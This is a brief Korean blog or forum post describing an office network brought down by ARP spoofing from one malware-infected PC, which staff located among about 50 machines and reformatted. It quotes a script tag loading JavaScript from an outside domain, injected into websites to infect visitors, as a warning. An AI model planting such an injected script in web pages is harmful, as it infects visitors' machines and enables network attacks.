아침에 출근했더니 우리 전산실 막내의 토요일 보고서가 올라와 있는데

이녀석이 토요일 출근을 했더군요. 스푸핑 공격으로 시스템 마비가 되어 시스템 자체가 불통

감염된 PC한대를 찾기위해 50여대나 되는 전체 PC를 뒤졌다고합니다. 그리고 한대를 찾아냈는데

 

치료자체는 안되고 포맷했다는데

 

아래 스크립트들이 실행되면서 게이트웨이등의 ip를 혼란스럽게 만들어버립니다.

 

예) <script src="http://www.faloge.com/js/yahoo.js></script> 가 삽입된 웹사이트에 접속하는 순간 악성코드에 감염되며
감염된 PC는 동일 네트워크 상에 ARP 스푸핑을 공격을 실행합니다

 

 

막는 방법은 아직 못찾았는데 의심나는 사이트는 절대 접속하면 안되겠습니다.

"
XE Login